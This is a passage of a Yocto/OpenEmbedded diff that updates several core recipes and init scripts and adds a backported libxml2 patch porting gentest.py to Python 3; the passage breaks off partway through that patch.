10 file://defn2-c-man-don-t-rely-on-dpkg-architecture-to-set-a.patch \ 11 file://defn2-c-man-don-t-rely-on-dpkg-architecture-to-set-a.patch \
11 file://99_network \ 12 file://99_network \
12 file://0001-Define-FNM_EXTMATCH-for-musl.patch \ 13 file://0001-Define-FNM_EXTMATCH-for-musl.patch \
13 file://0001-Makefile-do-not-use-dpkg-for-determining-OS-type.patch \ 14 file://0001-Makefile-do-not-use-dpkg-for-determining-OS-type.patch \
15 file://0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch \
14 file://run-ptest \ 16 file://run-ptest \
15 ${@bb.utils.contains('DISTRO_FEATURES', 'ptest', 'file://tweak-ptest-script.patch', '', d)} \ 17 ${@bb.utils.contains('DISTRO_FEATURES', 'ptest', 'file://tweak-ptest-script.patch', '', d)} \
16 " 18 "
diff --git a/meta/recipes-core/images/build-appliance-image_15.0.0.bb b/meta/recipes-core/images/build-appliance-image_15.0.0.bb
index f5cc20fa6d..035312f4d9 100644
--- a/meta/recipes-core/images/build-appliance-image_15.0.0.bb
+++ b/meta/recipes-core/images/build-appliance-image_15.0.0.bb
@@ -22,9 +22,9 @@ APPEND += "rootfstype=ext4 quiet"
22DEPENDS = "zip-native python3-pip-native" 22DEPENDS = "zip-native python3-pip-native"
23IMAGE_FSTYPES = "wic.vmdk" 23IMAGE_FSTYPES = "wic.vmdk"
24 24
25inherit core-image module-base setuptools3 25inherit core-image setuptools3
26 26
27SRCREV ?= "fadf7d3343305337c38a5243797723c68e88276a" 27SRCREV ?= "77442211926cbe93d60108f6df4abda3bc06b735"
28SRC_URI = "git://git.yoctoproject.org/poky;branch=dunfell \ 28SRC_URI = "git://git.yoctoproject.org/poky;branch=dunfell \
29 file://Yocto_Build_Appliance.vmx \ 29 file://Yocto_Build_Appliance.vmx \
30 file://Yocto_Build_Appliance.vmxf \ 30 file://Yocto_Build_Appliance.vmxf \
@@ -61,12 +61,6 @@ fakeroot do_populate_poky_src () {
61 # Place the README_VirtualBox_Toaster file in builders home folder. 61 # Place the README_VirtualBox_Toaster file in builders home folder.
62 cp ${WORKDIR}/README_VirtualBox_Toaster.txt ${IMAGE_ROOTFS}/home/builder/ 62 cp ${WORKDIR}/README_VirtualBox_Toaster.txt ${IMAGE_ROOTFS}/home/builder/
63 63
64 # Create a symlink, needed for out-of-tree kernel modules build
65 if [ ! -e ${IMAGE_ROOTFS}/lib/modules/${KERNEL_VERSION}/build ]; then
66 rm -f ${IMAGE_ROOTFS}/lib/modules/${KERNEL_VERSION}/build
67 lnr ${IMAGE_ROOTFS}${KERNEL_SRC_PATH} ${IMAGE_ROOTFS}/lib/modules/${KERNEL_VERSION}/build
68 fi
69
70 echo "INHERIT += \"rm_work\"" >> ${IMAGE_ROOTFS}/home/builder/poky/build/conf/auto.conf 64 echo "INHERIT += \"rm_work\"" >> ${IMAGE_ROOTFS}/home/builder/poky/build/conf/auto.conf
71 echo "export LC_ALL=en_US.utf8" >> ${IMAGE_ROOTFS}/home/builder/.bashrc 65 echo "export LC_ALL=en_US.utf8" >> ${IMAGE_ROOTFS}/home/builder/.bashrc
72 66
diff --git a/meta/recipes-core/initrdscripts/files/init-install-efi.sh b/meta/recipes-core/initrdscripts/files/init-install-efi.sh
index b6855b5aac..f667518b89 100644
--- a/meta/recipes-core/initrdscripts/files/init-install-efi.sh
+++ b/meta/recipes-core/initrdscripts/files/init-install-efi.sh
@@ -279,6 +279,11 @@ fi
279 279
280umount /tgt_root 280umount /tgt_root
281 281
282# copy any extra files needed for ESP
283if [ -d /run/media/$1/esp ]; then
284 cp -r /run/media/$1/esp/* /boot
285fi
286
282# Copy kernel artifacts. To add more artifacts just add to types 287# Copy kernel artifacts. To add more artifacts just add to types
283# For now just support kernel types already being used by something in OE-core 288# For now just support kernel types already being used by something in OE-core
284for types in bzImage zImage vmlinux vmlinuz fitImage; do 289for types in bzImage zImage vmlinux vmlinuz fitImage; do
diff --git a/meta/recipes-core/initrdscripts/initramfs-framework/finish b/meta/recipes-core/initrdscripts/initramfs-framework/finish
index 717383ebac..dee3ab3387 100755
--- a/meta/recipes-core/initrdscripts/initramfs-framework/finish
+++ b/meta/recipes-core/initrdscripts/initramfs-framework/finish
@@ -14,6 +14,15 @@ finish_run() {
14 14
15 info "Switching root to '$ROOTFS_DIR'..." 15 info "Switching root to '$ROOTFS_DIR'..."
16 16
17 debug "Moving basic mounts onto rootfs"
18 for dir in `awk '/\/dev.* \/run\/media/{print $2}' /proc/mounts`; do
19 # Parse any OCT or HEX encoded chars such as spaces
20 # in the mount points to actual ASCII chars
21 dir=`printf $dir`
22 mkdir -p "${ROOTFS_DIR}/media/${dir##*/}"
23 mount -n --move "$dir" "${ROOTFS_DIR}/media/${dir##*/}"
24 done
25
17 debug "Moving /dev, /proc and /sys onto rootfs..." 26 debug "Moving /dev, /proc and /sys onto rootfs..."
18 mount --move /dev $ROOTFS_DIR/dev 27 mount --move /dev $ROOTFS_DIR/dev
19 mount --move /proc $ROOTFS_DIR/proc 28 mount --move /proc $ROOTFS_DIR/proc
diff --git a/meta/recipes-core/initrdscripts/initramfs-framework/rootfs b/meta/recipes-core/initrdscripts/initramfs-framework/rootfs
index 748c9391c0..1d8a0ae66d 100644
--- a/meta/recipes-core/initrdscripts/initramfs-framework/rootfs
+++ b/meta/recipes-core/initrdscripts/initramfs-framework/rootfs
@@ -67,8 +67,8 @@ rootfs_run() {
67 # It is unlikely to change, but keep trying anyway. 67 # It is unlikely to change, but keep trying anyway.
68 # Perhaps we pick a different device next time. 68 # Perhaps we pick a different device next time.
69 umount $ROOTFS_DIR 69 umount $ROOTFS_DIR
70 fi
71 fi 70 fi
71 fi
72 fi 72 fi
73 debug "Sleeping for $delay second(s) to wait root to settle..." 73 debug "Sleeping for $delay second(s) to wait root to settle..."
74 sleep $delay 74 sleep $delay
diff --git a/meta/recipes-core/initrdscripts/initramfs-framework/setup-live b/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
index 4c79f41285..7e92f93322 100644
--- a/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
+++ b/meta/recipes-core/initrdscripts/initramfs-framework/setup-live
@@ -1,4 +1,4 @@
1#/bin/sh 1#!/bin/sh
2# Copyright (C) 2011 O.S. Systems Software LTDA. 2# Copyright (C) 2011 O.S. Systems Software LTDA.
3# Licensed on MIT 3# Licensed on MIT
4 4
diff --git a/meta/recipes-core/initscripts/initscripts_1.0.bb b/meta/recipes-core/initscripts/initscripts_1.0.bb
index f98e42eb2e..cb5417cc39 100644
--- a/meta/recipes-core/initscripts/initscripts_1.0.bb
+++ b/meta/recipes-core/initscripts/initscripts_1.0.bb
@@ -129,7 +129,7 @@ do_install () {
129 update-rc.d -r ${D} rmnologin.sh start 99 2 3 4 5 . 129 update-rc.d -r ${D} rmnologin.sh start 99 2 3 4 5 .
130 update-rc.d -r ${D} sendsigs start 20 0 6 . 130 update-rc.d -r ${D} sendsigs start 20 0 6 .
131 update-rc.d -r ${D} urandom start 38 S 0 6 . 131 update-rc.d -r ${D} urandom start 38 S 0 6 .
132 update-rc.d -r ${D} umountnfs.sh start 31 0 1 6 . 132 update-rc.d -r ${D} umountnfs.sh stop 31 0 1 6 .
133 update-rc.d -r ${D} umountfs start 40 0 6 . 133 update-rc.d -r ${D} umountfs start 40 0 6 .
134 update-rc.d -r ${D} reboot start 90 6 . 134 update-rc.d -r ${D} reboot start 90 6 .
135 update-rc.d -r ${D} halt start 90 0 . 135 update-rc.d -r ${D} halt start 90 0 .
diff --git a/meta/recipes-core/kbd/kbd_2.2.0.bb b/meta/recipes-core/kbd/kbd_2.2.0.bb
index e5700ff57f..d10c93dfb7 100644
--- a/meta/recipes-core/kbd/kbd_2.2.0.bb
+++ b/meta/recipes-core/kbd/kbd_2.2.0.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Keytable files and keyboard utilities" 1SUMMARY = "Keytable files and keyboard utilities"
2HOMEPAGE = "http://www.kbd-project.org/" 2HOMEPAGE = "http://www.kbd-project.org/"
3DESCRIPTION = "The kbd project contains tools for managing Linux console (Linux console, virtual terminals, keyboard, etc.) – mainly, what they do is loading console fonts and keyboard maps."
3# everything minus console-fonts is GPLv2+ 4# everything minus console-fonts is GPLv2+
4LICENSE = "GPLv2+" 5LICENSE = "GPLv2+"
5LIC_FILES_CHKSUM = "file://COPYING;md5=892f569a555ba9c07a568a7c0c4fa63a" 6LIC_FILES_CHKSUM = "file://COPYING;md5=892f569a555ba9c07a568a7c0c4fa63a"
diff --git a/meta/recipes-core/libxcrypt/libxcrypt.inc b/meta/recipes-core/libxcrypt/libxcrypt.inc
index 2d2a0b03e3..b6bf48ba79 100644
--- a/meta/recipes-core/libxcrypt/libxcrypt.inc
+++ b/meta/recipes-core/libxcrypt/libxcrypt.inc
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM ?= "file://LICENSING;md5=3bb6614cf5880cbf1b9dbd9e3d145e2c \
9 9
10inherit autotools pkgconfig 10inherit autotools pkgconfig
11 11
12SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH}" 12SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH};protocol=https"
13SRCREV = "823437d015cd4ab4d100ed205f218681b03ae45c" 13SRCREV = "823437d015cd4ab4d100ed205f218681b03ae45c"
14SRCBRANCH ?= "develop" 14SRCBRANCH ?= "develop"
15 15
diff --git a/meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch b/meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch
new file mode 100644
index 0000000000..b0d26d1c08
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch
@@ -0,0 +1,813 @@
1From b5125000917810731bc28055c0445d571121f80e Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Thu, 21 Apr 2022 00:45:58 +0200
4Subject: [PATCH] Port gentest.py to Python 3
5
6Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/343fc1421cdae097fa6c4cffeb1a065a40be6bbb]
7
8* fixes:
9
10make[1]: 'testReader' is up to date.
11 File "../libxml2-2.9.10/gentest.py", line 11
12 print "libxml2 python bindings not available, skipping testapi.c generation"
13 ^
14SyntaxError: Missing parentheses in call to 'print'. Did you mean print("libxml2 python bindings not available, skipping testapi.c generation")?
15make[1]: [Makefile:2078: testapi.c] Error 1 (ignored)
16
17...
18
19make[1]: 'testReader' is up to date.
20 File "../libxml2-2.9.10/gentest.py", line 271
21 return 1
22 ^
23TabError: inconsistent use of tabs and spaces in indentation
24make[1]: [Makefile:2078: testapi.c] Error 1 (ignored)
25
26...
27
28aarch64-oe-linux-gcc: error: testapi.c: No such file or directory
29aarch64-oe-linux-gcc: fatal error: no input files
30compilation terminated.
31make[1]: *** [Makefile:1275: testapi.o] Error 1
32
33But there is still a bit mystery why it worked before, because check-am
34calls gentest.py with $(PYTHON), so it ignores the shebang in the script
35and libxml2 is using python3native (through python3targetconfig.bbclass)
36so something like:
37
38libxml2/2.9.10-r0/recipe-sysroot-native/usr/bin/python3-native/python3 gentest.py
39
40But that still fails (now without SyntaxError) with:
41libxml2 python bindings not available, skipping testapi.c generation
42
43because we don't have dependency on libxml2-native (to provide libxml2
44python bindings form python3native) and exported PYTHON_SITE_PACKAGES
45might be useless (e.g. /usr/lib/python3.8/site-packages on Ubuntu-22.10
46which uses python 3.10 and there is no site-packages with libxml2)
47
48Signed-off-by: Martin Jansa <Martin.Jansa@gmail.com>
49---
50 gentest.py | 421 ++++++++++++++++++++++++++---------------------------
51 1 file changed, 209 insertions(+), 212 deletions(-)
52
53diff --git a/gentest.py b/gentest.py
54index b763300..0756706 100755
55--- a/gentest.py
56+++ b/gentest.py
57@@ -8,7 +8,7 @@ import string
58 try:
59 import libxml2
60 except:
61- print "libxml2 python bindings not available, skipping testapi.c generation"
62+ print("libxml2 python bindings not available, skipping testapi.c generation")
63 sys.exit(0)
64
65 if len(sys.argv) > 1:
66@@ -227,7 +227,7 @@ extra_post_call = {
67 if (old != NULL) {
68 xmlUnlinkNode(old);
69 xmlFreeNode(old) ; old = NULL ; }
70- ret_val = NULL;""",
71+\t ret_val = NULL;""",
72 "xmlTextMerge":
73 """if ((first != NULL) && (first->type != XML_TEXT_NODE)) {
74 xmlUnlinkNode(second);
75@@ -236,7 +236,7 @@ extra_post_call = {
76 """if ((ret_val != NULL) && (ret_val != ncname) &&
77 (ret_val != prefix) && (ret_val != memory))
78 xmlFree(ret_val);
79- ret_val = NULL;""",
80+\t ret_val = NULL;""",
81 "xmlNewDocElementContent":
82 """xmlFreeDocElementContent(doc, ret_val); ret_val = NULL;""",
83 "xmlDictReference": "xmlDictFree(dict);",
84@@ -268,29 +268,29 @@ modules = []
85 def is_skipped_module(name):
86 for mod in skipped_modules:
87 if mod == name:
88- return 1
89+ return 1
90 return 0
91
92 def is_skipped_function(name):
93 for fun in skipped_functions:
94 if fun == name:
95- return 1
96+ return 1
97 # Do not test destructors
98- if string.find(name, 'Free') != -1:
99+ if name.find('Free') != -1:
100 return 1
101 return 0
102
103 def is_skipped_memcheck(name):
104 for fun in skipped_memcheck:
105 if fun == name:
106- return 1
107+ return 1
108 return 0
109
110 missing_types = {}
111 def add_missing_type(name, func):
112 try:
113 list = missing_types[name]
114- list.append(func)
115+ list.append(func)
116 except:
117 missing_types[name] = [func]
118
119@@ -310,7 +310,7 @@ def add_missing_functions(name, module):
120 missing_functions_nr = missing_functions_nr + 1
121 try:
122 list = missing_functions[module]
123- list.append(name)
124+ list.append(name)
125 except:
126 missing_functions[module] = [name]
127
128@@ -319,45 +319,45 @@ def add_missing_functions(name, module):
129 #
130
131 def type_convert(str, name, info, module, function, pos):
132-# res = string.replace(str, " ", " ")
133-# res = string.replace(str, " ", " ")
134-# res = string.replace(str, " ", " ")
135- res = string.replace(str, " *", "_ptr")
136-# res = string.replace(str, "*", "_ptr")
137- res = string.replace(res, " ", "_")
138+# res = str.replace(" ", " ")
139+# res = str.replace(" ", " ")
140+# res = str.replace(" ", " ")
141+ res = str.replace(" *", "_ptr")
142+# res = str.replace("*", "_ptr")
143+ res = res.replace(" ", "_")
144 if res == 'const_char_ptr':
145- if string.find(name, "file") != -1 or \
146- string.find(name, "uri") != -1 or \
147- string.find(name, "URI") != -1 or \
148- string.find(info, "filename") != -1 or \
149- string.find(info, "URI") != -1 or \
150- string.find(info, "URL") != -1:
151- if string.find(function, "Save") != -1 or \
152- string.find(function, "Create") != -1 or \
153- string.find(function, "Write") != -1 or \
154- string.find(function, "Fetch") != -1:
155- return('fileoutput')
156- return('filepath')
157+ if name.find("file") != -1 or \
158+ name.find("uri") != -1 or \
159+ name.find("URI") != -1 or \
160+ info.find("filename") != -1 or \
161+ info.find("URI") != -1 or \
162+ info.find("URL") != -1:
163+ if function.find("Save") != -1 or \
164+ function.find("Create") != -1 or \
165+ function.find("Write") != -1 or \
166+ function.find("Fetch") != -1:
167+ return('fileoutput')
168+ return('filepath')
169 if res == 'void_ptr':
170 if module == 'nanoftp' and name == 'ctx':
171- return('xmlNanoFTPCtxtPtr')
172+ return('xmlNanoFTPCtxtPtr')
173 if function == 'xmlNanoFTPNewCtxt' or \
174- function == 'xmlNanoFTPConnectTo' or \
175- function == 'xmlNanoFTPOpen':
176- return('xmlNanoFTPCtxtPtr')
177+ function == 'xmlNanoFTPConnectTo' or \
178+ function == 'xmlNanoFTPOpen':
179+ return('xmlNanoFTPCtxtPtr')
180 if module == 'nanohttp' and name == 'ctx':
181- return('xmlNanoHTTPCtxtPtr')
182- if function == 'xmlNanoHTTPMethod' or \
183- function == 'xmlNanoHTTPMethodRedir' or \
184- function == 'xmlNanoHTTPOpen' or \
185- function == 'xmlNanoHTTPOpenRedir':
186- return('xmlNanoHTTPCtxtPtr');
187+ return('xmlNanoHTTPCtxtPtr')
188+ if function == 'xmlNanoHTTPMethod' or \
189+ function == 'xmlNanoHTTPMethodRedir' or \
190+ function == 'xmlNanoHTTPOpen' or \
191+ function == 'xmlNanoHTTPOpenRedir':
192+ return('xmlNanoHTTPCtxtPtr');
193 if function == 'xmlIOHTTPOpen':
194- return('xmlNanoHTTPCtxtPtr')
195- if string.find(name, "data") != -1:
196- return('userdata')
197- if string.find(name, "user") != -1:
198- return('userdata')
199+ return('xmlNanoHTTPCtxtPtr')
200+ if name.find("data") != -1:
201+ return('userdata')
202+ if name.find("user") != -1:
203+ return('userdata')
204 if res == 'xmlDoc_ptr':
205 res = 'xmlDocPtr'
206 if res == 'xmlNode_ptr':
207@@ -366,18 +366,18 @@ def type_convert(str, name, info, module, function, pos):
208 res = 'xmlDictPtr'
209 if res == 'xmlNodePtr' and pos != 0:
210 if (function == 'xmlAddChild' and pos == 2) or \
211- (function == 'xmlAddChildList' and pos == 2) or \
212+ (function == 'xmlAddChildList' and pos == 2) or \
213 (function == 'xmlAddNextSibling' and pos == 2) or \
214 (function == 'xmlAddSibling' and pos == 2) or \
215 (function == 'xmlDocSetRootElement' and pos == 2) or \
216 (function == 'xmlReplaceNode' and pos == 2) or \
217 (function == 'xmlTextMerge') or \
218- (function == 'xmlAddPrevSibling' and pos == 2):
219- return('xmlNodePtr_in');
220+ (function == 'xmlAddPrevSibling' and pos == 2):
221+ return('xmlNodePtr_in');
222 if res == 'const xmlBufferPtr':
223 res = 'xmlBufferPtr'
224 if res == 'xmlChar_ptr' and name == 'name' and \
225- string.find(function, "EatName") != -1:
226+ function.find("EatName") != -1:
227 return('eaten_name')
228 if res == 'void_ptr*':
229 res = 'void_ptr_ptr'
230@@ -393,7 +393,7 @@ def type_convert(str, name, info, module, function, pos):
231 res = 'debug_FILE_ptr';
232 if res == 'int' and name == 'options':
233 if module == 'parser' or module == 'xmlreader':
234- res = 'parseroptions'
235+ res = 'parseroptions'
236
237 return res
238
239@@ -402,28 +402,28 @@ known_param_types = []
240 def is_known_param_type(name):
241 for type in known_param_types:
242 if type == name:
243- return 1
244+ return 1
245 return name[-3:] == 'Ptr' or name[-4:] == '_ptr'
246
247 def generate_param_type(name, rtype):
248 global test
249 for type in known_param_types:
250 if type == name:
251- return
252+ return
253 for type in generated_param_types:
254 if type == name:
255- return
256+ return
257
258 if name[-3:] == 'Ptr' or name[-4:] == '_ptr':
259 if rtype[0:6] == 'const ':
260- crtype = rtype[6:]
261- else:
262- crtype = rtype
263+ crtype = rtype[6:]
264+ else:
265+ crtype = rtype
266
267 define = 0
268- if modules_defines.has_key(module):
269- test.write("#ifdef %s\n" % (modules_defines[module]))
270- define = 1
271+ if module in modules_defines:
272+ test.write("#ifdef %s\n" % (modules_defines[module]))
273+ define = 1
274 test.write("""
275 #define gen_nb_%s 1
276 static %s gen_%s(int no ATTRIBUTE_UNUSED, int nr ATTRIBUTE_UNUSED) {
277@@ -433,7 +433,7 @@ static void des_%s(int no ATTRIBUTE_UNUSED, %s val ATTRIBUTE_UNUSED, int nr ATTR
278 }
279 """ % (name, crtype, name, name, rtype))
280 if define == 1:
281- test.write("#endif\n\n")
282+ test.write("#endif\n\n")
283 add_generated_param_type(name)
284
285 #
286@@ -445,7 +445,7 @@ known_return_types = []
287 def is_known_return_type(name):
288 for type in known_return_types:
289 if type == name:
290- return 1
291+ return 1
292 return 0
293
294 #
295@@ -471,7 +471,7 @@ def compare_and_save():
296 try:
297 os.system("rm testapi.c; mv testapi.c.new testapi.c")
298 except:
299- os.system("mv testapi.c.new testapi.c")
300+ os.system("mv testapi.c.new testapi.c")
301 print("Updated testapi.c")
302 else:
303 print("Generated testapi.c is identical")
304@@ -481,17 +481,17 @@ while line != "":
305 if line == "/* CUT HERE: everything below that line is generated */\n":
306 break;
307 if line[0:15] == "#define gen_nb_":
308- type = string.split(line[15:])[0]
309- known_param_types.append(type)
310+ type = line[15:].split()[0]
311+ known_param_types.append(type)
312 if line[0:19] == "static void desret_":
313- type = string.split(line[19:], '(')[0]
314- known_return_types.append(type)
315+ type = line[19:].split('(')[0]
316+ known_return_types.append(type)
317 test.write(line)
318 line = input.readline()
319 input.close()
320
321 if line == "":
322- print "Could not find the CUT marker in testapi.c skipping generation"
323+ print("Could not find the CUT marker in testapi.c skipping generation")
324 test.close()
325 sys.exit(0)
326
327@@ -505,7 +505,7 @@ test.write("/* CUT HERE: everything below that line is generated */\n")
328 #
329 doc = libxml2.readFile(srcPref + 'doc/libxml2-api.xml', None, 0)
330 if doc == None:
331- print "Failed to load doc/libxml2-api.xml"
332+ print("Failed to load doc/libxml2-api.xml")
333 sys.exit(1)
334 ctxt = doc.xpathNewContext()
335
336@@ -519,9 +519,9 @@ for arg in args:
337 mod = arg.xpathEval('string(../@file)')
338 func = arg.xpathEval('string(../@name)')
339 if (mod not in skipped_modules) and (func not in skipped_functions):
340- type = arg.xpathEval('string(@type)')
341- if not argtypes.has_key(type):
342- argtypes[type] = func
343+ type = arg.xpathEval('string(@type)')
344+ if type not in argtypes:
345+ argtypes[type] = func
346
347 # similarly for return types
348 rettypes = {}
349@@ -531,8 +531,8 @@ for ret in rets:
350 func = ret.xpathEval('string(../@name)')
351 if (mod not in skipped_modules) and (func not in skipped_functions):
352 type = ret.xpathEval('string(@type)')
353- if not rettypes.has_key(type):
354- rettypes[type] = func
355+ if type not in rettypes:
356+ rettypes[type] = func
357
358 #
359 # Generate constructors and return type handling for all enums
360@@ -549,49 +549,49 @@ for enum in enums:
361 continue;
362 define = 0
363
364- if argtypes.has_key(name) and is_known_param_type(name) == 0:
365- values = ctxt.xpathEval("/api/symbols/enum[@type='%s']" % name)
366- i = 0
367- vals = []
368- for value in values:
369- vname = value.xpathEval('string(@name)')
370- if vname == None:
371- continue;
372- i = i + 1
373- if i >= 5:
374- break;
375- vals.append(vname)
376- if vals == []:
377- print "Didn't find any value for enum %s" % (name)
378- continue
379- if modules_defines.has_key(module):
380- test.write("#ifdef %s\n" % (modules_defines[module]))
381- define = 1
382- test.write("#define gen_nb_%s %d\n" % (name, len(vals)))
383- test.write("""static %s gen_%s(int no, int nr ATTRIBUTE_UNUSED) {\n""" %
384- (name, name))
385- i = 1
386- for value in vals:
387- test.write(" if (no == %d) return(%s);\n" % (i, value))
388- i = i + 1
389- test.write(""" return(0);
390+ if (name in argtypes) and is_known_param_type(name) == 0:
391+ values = ctxt.xpathEval("/api/symbols/enum[@type='%s']" % name)
392+ i = 0
393+ vals = []
394+ for value in values:
395+ vname = value.xpathEval('string(@name)')
396+ if vname == None:
397+ continue;
398+ i = i + 1
399+ if i >= 5:
400+ break;
401+ vals.append(vname)
402+ if vals == []:
403+ print("Didn't find any value for enum %s" % (name))
404+ continue
405+ if module in modules_defines:
406+ test.write("#ifdef %s\n" % (modules_defines[module]))
407+ define = 1
408+ test.write("#define gen_nb_%s %d\n" % (name, len(vals)))
409+ test.write("""static %s gen_%s(int no, int nr ATTRIBUTE_UNUSED) {\n""" %
410+ (name, name))
411+ i = 1
412+ for value in vals:
413+ test.write(" if (no == %d) return(%s);\n" % (i, value))
414+ i = i + 1
415+ test.write(""" return(0);
416 }
417
418 static void des_%s(int no ATTRIBUTE_UNUSED, %s val ATTRIBUTE_UNUSED, int nr ATTRIBUTE_UNUSED) {
419 }
420
421 """ % (name, name));
422- known_param_types.append(name)
423+ known_param_types.append(name)
424
425 if (is_known_return_type(name) == 0) and (name in rettypes):
426- if define == 0 and modules_defines.has_key(module):
427- test.write("#ifdef %s\n" % (modules_defines[module]))
428- define = 1
429+ if define == 0 and (module in modules_defines):
430+ test.write("#ifdef %s\n" % (modules_defines[module]))
431+ define = 1
432 test.write("""static void desret_%s(%s val ATTRIBUTE_UNUSED) {
433 }
434
435 """ % (name, name))
436- known_return_types.append(name)
437+ known_return_types.append(name)
438 if define == 1:
439 test.write("#endif\n\n")
440
441@@ -615,9 +615,9 @@ for file in headers:
442 # do not test deprecated APIs
443 #
444 desc = file.xpathEval('string(description)')
445- if string.find(desc, 'DEPRECATED') != -1:
446- print "Skipping deprecated interface %s" % name
447- continue;
448+ if desc.find('DEPRECATED') != -1:
449+ print("Skipping deprecated interface %s" % name)
450+ continue;
451
452 test.write("#include <libxml/%s.h>\n" % name)
453 modules.append(name)
454@@ -679,7 +679,7 @@ def generate_test(module, node):
455 # and store the informations for the generation
456 #
457 try:
458- args = node.xpathEval("arg")
459+ args = node.xpathEval("arg")
460 except:
461 args = []
462 t_args = []
463@@ -687,37 +687,37 @@ def generate_test(module, node):
464 for arg in args:
465 n = n + 1
466 rtype = arg.xpathEval("string(@type)")
467- if rtype == 'void':
468- break;
469- info = arg.xpathEval("string(@info)")
470- nam = arg.xpathEval("string(@name)")
471+ if rtype == 'void':
472+ break;
473+ info = arg.xpathEval("string(@info)")
474+ nam = arg.xpathEval("string(@name)")
475 type = type_convert(rtype, nam, info, module, name, n)
476- if is_known_param_type(type) == 0:
477- add_missing_type(type, name);
478- no_gen = 1
479+ if is_known_param_type(type) == 0:
480+ add_missing_type(type, name);
481+ no_gen = 1
482 if (type[-3:] == 'Ptr' or type[-4:] == '_ptr') and \
483- rtype[0:6] == 'const ':
484- crtype = rtype[6:]
485- else:
486- crtype = rtype
487- t_args.append((nam, type, rtype, crtype, info))
488+ rtype[0:6] == 'const ':
489+ crtype = rtype[6:]
490+ else:
491+ crtype = rtype
492+ t_args.append((nam, type, rtype, crtype, info))
493
494 try:
495- rets = node.xpathEval("return")
496+ rets = node.xpathEval("return")
497 except:
498 rets = []
499 t_ret = None
500 for ret in rets:
501 rtype = ret.xpathEval("string(@type)")
502- info = ret.xpathEval("string(@info)")
503+ info = ret.xpathEval("string(@info)")
504 type = type_convert(rtype, 'return', info, module, name, 0)
505- if rtype == 'void':
506- break
507- if is_known_return_type(type) == 0:
508- add_missing_type(type, name);
509- no_gen = 1
510- t_ret = (type, rtype, info)
511- break
512+ if rtype == 'void':
513+ break
514+ if is_known_return_type(type) == 0:
515+ add_missing_type(type, name);
516+ no_gen = 1
517+ t_ret = (type, rtype, info)
518+ break
519
520 if no_gen == 0:
521 for t_arg in t_args:
522@@ -733,7 +733,7 @@ test_%s(void) {
523
524 if no_gen == 1:
525 add_missing_functions(name, module)
526- test.write("""
527+ test.write("""
528 /* missing type support */
529 return(test_ret);
530 }
531@@ -742,22 +742,22 @@ test_%s(void) {
532 return
533
534 try:
535- conds = node.xpathEval("cond")
536- for cond in conds:
537- test.write("#if %s\n" % (cond.get_content()))
538- nb_cond = nb_cond + 1
539+ conds = node.xpathEval("cond")
540+ for cond in conds:
541+ test.write("#if %s\n" % (cond.get_content()))
542+ nb_cond = nb_cond + 1
543 except:
544 pass
545
546 define = 0
547- if function_defines.has_key(name):
548+ if name in function_defines:
549 test.write("#ifdef %s\n" % (function_defines[name]))
550- define = 1
551+ define = 1
552
553 # Declare the memory usage counter
554 no_mem = is_skipped_memcheck(name)
555 if no_mem == 0:
556- test.write(" int mem_base;\n");
557+ test.write(" int mem_base;\n");
558
559 # Declare the return value
560 if t_ret != None:
561@@ -766,29 +766,29 @@ test_%s(void) {
562 # Declare the arguments
563 for arg in t_args:
564 (nam, type, rtype, crtype, info) = arg;
565- # add declaration
566- test.write(" %s %s; /* %s */\n" % (crtype, nam, info))
567- test.write(" int n_%s;\n" % (nam))
568+ # add declaration
569+ test.write(" %s %s; /* %s */\n" % (crtype, nam, info))
570+ test.write(" int n_%s;\n" % (nam))
571 test.write("\n")
572
573 # Cascade loop on of each argument list of values
574 for arg in t_args:
575 (nam, type, rtype, crtype, info) = arg;
576- #
577- test.write(" for (n_%s = 0;n_%s < gen_nb_%s;n_%s++) {\n" % (
578- nam, nam, type, nam))
579+ #
580+ test.write(" for (n_%s = 0;n_%s < gen_nb_%s;n_%s++) {\n" % (
581+ nam, nam, type, nam))
582
583 # log the memory usage
584 if no_mem == 0:
585- test.write(" mem_base = xmlMemBlocks();\n");
586+ test.write(" mem_base = xmlMemBlocks();\n");
587
588 # prepare the call
589 i = 0;
590 for arg in t_args:
591 (nam, type, rtype, crtype, info) = arg;
592- #
593- test.write(" %s = gen_%s(n_%s, %d);\n" % (nam, type, nam, i))
594- i = i + 1;
595+ #
596+ test.write(" %s = gen_%s(n_%s, %d);\n" % (nam, type, nam, i))
597+ i = i + 1;
598
599 # add checks to avoid out-of-bounds array access
600 i = 0;
601@@ -797,7 +797,7 @@ test_%s(void) {
602 # assume that "size", "len", and "start" parameters apply to either
603 # the nearest preceding or following char pointer
604 if type == "int" and (nam == "size" or nam == "len" or nam == "start"):
605- for j in range(i - 1, -1, -1) + range(i + 1, len(t_args)):
606+ for j in (*range(i - 1, -1, -1), *range(i + 1, len(t_args))):
607 (bnam, btype) = t_args[j][:2]
608 if btype == "const_char_ptr" or btype == "const_xmlChar_ptr":
609 test.write(
610@@ -806,42 +806,42 @@ test_%s(void) {
611 " continue;\n"
612 % (bnam, nam, bnam))
613 break
614- i = i + 1;
615+ i = i + 1;
616
617 # do the call, and clanup the result
618- if extra_pre_call.has_key(name):
619- test.write(" %s\n"% (extra_pre_call[name]))
620+ if name in extra_pre_call:
621+ test.write(" %s\n"% (extra_pre_call[name]))
622 if t_ret != None:
623- test.write("\n ret_val = %s(" % (name))
624- need = 0
625- for arg in t_args:
626- (nam, type, rtype, crtype, info) = arg
627- if need:
628- test.write(", ")
629- else:
630- need = 1
631- if rtype != crtype:
632- test.write("(%s)" % rtype)
633- test.write("%s" % nam);
634- test.write(");\n")
635- if extra_post_call.has_key(name):
636- test.write(" %s\n"% (extra_post_call[name]))
637- test.write(" desret_%s(ret_val);\n" % t_ret[0])
638+ test.write("\n ret_val = %s(" % (name))
639+ need = 0
640+ for arg in t_args:
641+ (nam, type, rtype, crtype, info) = arg
642+ if need:
643+ test.write(", ")
